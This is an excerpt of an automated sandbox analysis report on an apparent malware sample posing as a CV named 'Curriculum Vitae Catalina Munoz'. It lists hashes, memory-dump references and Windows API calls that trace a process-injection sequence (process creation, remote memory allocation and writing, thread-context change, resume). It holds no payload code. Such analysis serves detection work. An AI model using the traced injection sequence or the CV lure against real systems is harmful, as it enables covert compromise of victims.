                                    • Instruction ID: bd2e0b2206da7d46ef4ca2e0bd009b5c206e8f5c7d3ae5ece3f6176f465c01a9
                                    • Opcode Fuzzy Hash: 02763853e4129d0240d54bedabcbbc5e760643d4da409d111d82468429899d5d
                                    • Instruction Fuzzy Hash: 8C51DEB1D10349DFDF14CFAAD884ADEBBB1BF48310F64812AE859AB250D7759845CF90
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07890276
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1209871523.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7890000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 105d37491a8d134fac1eae50aeba5e6f3104eb4a280f70d4853d9bd5318fb0c0
                                    • Instruction ID: 1cb8e3bb4131c4f1fe4f9f1d22aff1660f2bc82f4ca5f06902ab65b0f2fafe7e
                                    • Opcode Fuzzy Hash: 105d37491a8d134fac1eae50aeba5e6f3104eb4a280f70d4853d9bd5318fb0c0
                                    • Instruction Fuzzy Hash: 0EA14AB1D0135ACFDF25DF68C8417DEBBB2AB49310F1881A9E848E7240DB759985CF91
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07890276
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1209871523.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7890000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 063ff05630e91735cb7c893ddb3690620ff0bf95b4fe102053be64b9d0760336
                                    • Instruction ID: 9f83bcb34bf3f9a2aa0aae563f87dcd0d53cfd96cf4f3cf77d2e153d2d2826bc
                                    • Opcode Fuzzy Hash: 063ff05630e91735cb7c893ddb3690620ff0bf95b4fe102053be64b9d0760336
                                    • Instruction Fuzzy Hash: 2F913BB1D0131ADFEF24DF69C84179DBBB2BB48310F188169E849E7240DB759985CF91
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02CDDA7E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E444E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E444E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: CreateWindow
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 02CD5DB1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: Create
                                    APIs
                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 05E46BD1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: CallProcWindow
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 02CD5DB1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: Create
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0751F928
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    APIs
                                    • PostMessageW.USER32(?,?,?,?), ref: 07892355
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1209871523.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7890000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0751F77E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    APIs
                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05F8769F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207721619.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f80000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: DrawText
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0751F928
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    APIs
                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05F8769F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207721619.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f80000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: DrawText
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0751FA08
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0751F77E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0751FA08
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E4030F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05E4030F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0751F846
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02CDDAF9,00000800,00000000,00000000), ref: 02CDDCEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02CDDAF9,00000800,00000000,00000000), ref: 02CDDCEA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0751F846
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    APIs
                                    • PostMessageW.USER32(?,?,?,?), ref: 07892355
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1209871523.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7890000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02CDDA7E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    APIs
                                    • PostMessageW.USER32(?,?,?,?), ref: 07892355
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1209871523.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7890000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: MessagePost

                                    Execution Graph

                                    Execution Coverage:1.1%
                                    Dynamic/Decrypted Code Coverage:5.2%
                                    Signature Coverage:8.1%
                                    Total number of Nodes:135
                                    Total number of Limit Nodes:11

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 105 4177f3-41780f 106 417817-41781c 105->106 107 417812 call 42df23 105->107 108 417822-417830 call 42e443 106->108 109 41781e-417821 106->109 107->106 112 417840-417851 call 42c903 108->112 113 417832-41783d call 42e6e3 108->113 118 417853-417867 LdrLoadDll 112->118 119 41786a-41786d 112->119 113->112 118->119
                                    APIs
                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417865
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Load
                                    • String ID:
                                    • API String ID: 2234796835-0
                                    • Opcode ID: 0a5b46808d07e863b45c642623f8f10eb7d4fdfe879cc680468a100e3a6e7ddd
                                    • Instruction ID: c600fbf14ccdb3b6bbdc0d7a0d34ba2adb134db4c3159965c65cc2899dd20b40
                                    • Opcode Fuzzy Hash: 0a5b46808d07e863b45c642623f8f10eb7d4fdfe879cc680468a100e3a6e7ddd
                                    • Instruction Fuzzy Hash: 2E015EB1E4020DBBDB10EAA1DC46FDEB3B8AB14308F04419AE90897240F634EB44CB95

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 130 42b353-42b38c call 4047d3 call 42c403 NtClose
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    • Opcode ID: 72b71f9a6b8d339d6c9fae34c2719ce30272c9944d81a440af5fa0689e489d0b
                                    • Instruction ID: bcf21dc0d3ee2efe2e1afd8d6137da1a1ed99b5e6b7e79da75cbf38aa045c435
                                    • Opcode Fuzzy Hash: 72b71f9a6b8d339d6c9fae34c2719ce30272c9944d81a440af5fa0689e489d0b
                                    • Instruction Fuzzy Hash: 89E08C362042147BD620FA5AEC42FABB76CDFC5718F40402AFA08A7282C774BA1187F5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 144 1532b60-1532b6c LdrInitializeThunk
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 6716553c75b9675332a65be5b1751a1ed7fa0d853122c2c8a344e176f732c445
                                    • Instruction ID: 7abd6c26aeca4f84cc7d15c94a930a4b7683e83ed4c4a65aeb9e29f810bb3e14
                                    • Opcode Fuzzy Hash: 6716553c75b9675332a65be5b1751a1ed7fa0d853122c2c8a344e176f732c445
                                    • Instruction Fuzzy Hash: 5D90027120240003410571994414616405AA7E0215B59C421E1014990DC5B589916225
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 1253f9e095866d1bea63dba8114fd486d4c0e4531fc849e8178375d585a40ba1
                                    • Instruction ID: 78ac999c06f632d88473396045dbbff633e11e930c292c5eddadabd236447928
                                    • Opcode Fuzzy Hash: 1253f9e095866d1bea63dba8114fd486d4c0e4531fc849e8178375d585a40ba1
                                    • Instruction Fuzzy Hash: B490023120140413D111719945047070059A7D0255F99C812A0424958DD6E68A52A221
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: b24b95f7cc9f14bbbe4682621a1b3800fb20f6ba828d94b454b957eaceda3366
                                    • Instruction ID: 6a7380860f71c200e04d7e2d7e28ef8f4f64b0a32e2b3c5d42c8c20806c9838f
                                    • Opcode Fuzzy Hash: b24b95f7cc9f14bbbe4682621a1b3800fb20f6ba828d94b454b957eaceda3366
                                    • Instruction Fuzzy Hash: BE90023120148803D1107199840474A0055A7D0315F5DC811A4424A58DC6E589917221
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 9f7dc2856ee371ea7ef120bcd6bfb1baaa6b1c651388297793aa20b5b3774330
                                    • Instruction ID: e8eff1221dcd7d2881a9ded410edc22ad766255445d6eef6db93c42cd6e87432
                                    • Opcode Fuzzy Hash: 9f7dc2856ee371ea7ef120bcd6bfb1baaa6b1c651388297793aa20b5b3774330
                                    • Instruction Fuzzy Hash: 1690023160550403D100719945147061055A7D0215F69C811A0424968DC7E58A5166A2

                                    Control-flow Graph

                                    APIs
                                    • PostThreadMessageW.USER32(63u1Q-P,00000111,00000000,00000000), ref: 00413E9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID: 63u1Q-P$63u1Q-P
                                    • API String ID: 1836367815-3696516997

                                    Control-flow Graph

                                    APIs
                                    • PostThreadMessageW.USER32(63u1Q-P,00000111,00000000,00000000), ref: 00413E9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID: 63u1Q-P$63u1Q-P
                                    • API String ID: 1836367815-3696516997

                                    Control-flow Graph

                                    APIs
                                    • PostThreadMessageW.USER32(63u1Q-P,00000111,00000000,00000000), ref: 00413E9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID: 63u1Q-P$63u1Q-P
                                    • API String ID: 1836367815-3696516997

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 88 41786e-41786f 89 417871-41787f 88->89 90 417896-417897 88->90 89->90 91 417899-4178a8 90->91 92 4178a9-4178aa 91->92 93 417841-417843 92->93 94 4178ac-4178c4 92->94 96 417849-417851 93->96 97 417844 call 42c903 93->97 95 4178c6-4178cf 94->95 94->96 101 4178d1-4178dc 95->101 102 41790d-41791e 95->102 99 417853-417867 LdrLoadDll 96->99 100 41786a-41786d 96->100 97->96 99->100 101->91 103 4178de-4178ea 101->103 102->92 104 417920-417927 102->104
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 120 42b653-42b697 call 4047d3 call 42c403 RtlAllocateHeap
                                    APIs
                                    • RtlAllocateHeap.NTDLL(?,0041DFE8,?,?,00000000,?,0041DFE8,?,?,?), ref: 0042B692
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 125 42b6a3-42b6e4 call 4047d3 call 42c403 RtlFreeHeap
                                    APIs
                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,1A5FE856,00000007,00000000,00000004,00000000,004170CE,000000F4,?,?,?,?,?), ref: 0042B6DF
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 135 42b6f3-42b72f call 4047d3 call 42c403 ExitProcess
                                    APIs
                                    • ExitProcess.KERNEL32(?,00000000,?,?,D79DDBBC,?,?,D79DDBBC), ref: 0042B72A
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 140 1532c0a-1532c0f 141 1532c11-1532c18 140->141 142 1532c1f-1532c26 LdrInitializeThunk 140->142
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                    • API String ID: 0-2160512332
                                    Strings
                                    • corrupted critical section, xrefs: 015654C2
                                    • Critical section debug info address, xrefs: 0156541F, 0156552E
                                    • Address of the debug info found in the active list., xrefs: 015654AE, 015654FA
                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01565543
                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0156540A, 01565496, 01565519
                                    • Critical section address., xrefs: 01565502
                                    • double initialized or corrupted critical section, xrefs: 01565508
                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015654E2
                                    • undeleted critical section in freed memory, xrefs: 0156542B
                                    • 8, xrefs: 015652E3
                                    • Invalid debug info address of this critical section, xrefs: 015654B6
                                    • Thread identifier, xrefs: 0156553A
                                    • Critical section address, xrefs: 01565425, 015654BC, 01565534
                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015654CE
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                    • API String ID: 0-2368682639
                                    Strings
                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01562412
                                    • @, xrefs: 0156259B
                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01562602
                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01562624
                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01562498
                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01562409
                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015622E4
                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015625EB
                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 0156261F
                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01562506
                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015624C0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
